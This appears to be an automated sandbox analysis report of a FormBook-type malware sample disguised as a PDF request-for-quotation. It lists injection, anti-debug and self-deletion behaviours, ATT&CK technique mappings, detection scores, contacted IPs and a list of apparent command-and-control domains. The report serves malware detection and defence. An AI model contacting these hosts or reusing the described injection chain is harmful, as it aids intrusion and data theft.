          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03243740 mov eax, dword ptr fs:[00000030h]2_2_03243740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03303749 mov eax, dword ptr fs:[00000030h]2_2_03303749
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A72622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A6083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A609D5 SetUnhandledExceptionFilter
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A60C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 164.92.166.75 80
          Source: C:\Windows\explorer.exe | Network Connect: 172.104.236.215 80
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exe | Thread register set: target process: 4004
          Source: C:\Windows\SysWOW64\help.exe | Thread register set: target process: 4004
          Source: C:\Windows\SysWOW64\svchost.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\svchost.exe | Section unmapped: C:\Windows\SysWOW64\help.exe base address: 870000
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 743008
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A82BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AAB226 SendInput,keybd_event
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AC22DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe"
          Source: C:\Windows\SysWOW64\help.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AA0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AA1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
          Source: RFQ PC25-1301 Product Specifications_PDF.exe, explorer.exe, 00000003.00000000.2345314189.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.2343445045.0000000000D69000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4769961785.0000000000D60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
          Source: explorer.exe, 00000003.00000000.2343927005.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770644430.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000003.2979322118.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A60698 cpuid
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AB8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A9D27A GetUserNameW
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A7B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00A442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match | File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_81
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_XP
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_XPe
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_VISTA
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_7
          Source: RFQ PC25-1301 Product Specifications_PDF.exe | Binary or memory string: WIN_8

          Remote Access Functionality

          Source: Yara match | File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.RFQ PC25-1301 Product Specifications_PDF.exe.990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.4770401565.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2399303548.0000000002990000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2341141720.0000000000990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2399244846.0000000000950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4769894181.0000000002CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.4770304327.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.2398790786.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\RFQ PC25-1301 Product Specifications_PDF.exe | Code function: 0_2_00AC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 1 Shared Modules | 2 Valid Accounts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 21 Input Capture | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 2 Valid Accounts | 3 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | 3 Clipboard Data | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 215 System Information Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 612 Process Injection | 2 Valid Accounts | LSA Secrets | 341 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Virtualization/Sandbox Evasion | Cached Domain Credentials | 12 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 21 Access Token Manipulation | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 612 Process Injection | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          Behavior Graph ID: 1589987 | Sample: RFQ PC25-1301 Product Speci... | Startdate: 13/01/2025 | Architecture: WINDOWS | Score: 100
          Process chain: RFQ PC25-1301 Product Specifications_PDF.exe (started) -> svchost.exe (started) -> explorer.exe (injected) -> help.exe (started) -> cmd.exe (started) -> conhost.exe (started); explorer.exe also started autoconv.exe.

          Source | Detection | Scanner | Label | Link
          RFQ PC25-1301 Product Specifications_PDF.exe | 37% | ReversingLabs | Win32.Backdoor.FormBook |
          RFQ PC25-1301 Product Specifications_PDF.exe | 100% | Avira | DR/AutoIt.Gen8 |
          RFQ PC25-1301 Product Specifications_PDF.exe | 100% | Joe Sandbox ML | |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                              http://www.86339.xyzReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://www.suv-deals-49508.bond/hwu6/explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://schemas.microexplorer.exe, 00000003.00000002.4775355459.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4775380521.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770959078.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.health-insurance-cake.world/hwu6/www.vibrantsoul.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.ozzd86fih4.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.gequiltdesins.shop/hwu6/www.backstretch.storeexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://www.health-insurance-cake.world/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://301.gn301.com:4500/?u=explorer.exe, 00000003.00000002.4782465999.000000001111F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003EFF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.moocatinght.topReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.d66dr114gl.bond/hwu6/www.ozzd86fih4.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.hair-transplantation-65829.bondReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.ilsgroup.netexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.suv-deals-49508.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.91uvq.proReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.simo1simo001.clickexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.vibrantsoul.xyz/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://excel.office.com-explorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.7b5846.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.hair-transplantation-65829.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.vibrantsoul.xyz/hwu6/www.86339.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.gequiltdesins.shopReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.gequiltdesins.shopexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                http://www.suv-deals-49508.bondReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.d66dr114gl.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://powerpoint.office.comEMdexplorer.exe, 00000003.00000000.2351958536.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780167257.000000000BFEF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.moocatinght.topexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.backstretch.store/hwu6/www.health-insurance-cake.worldexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
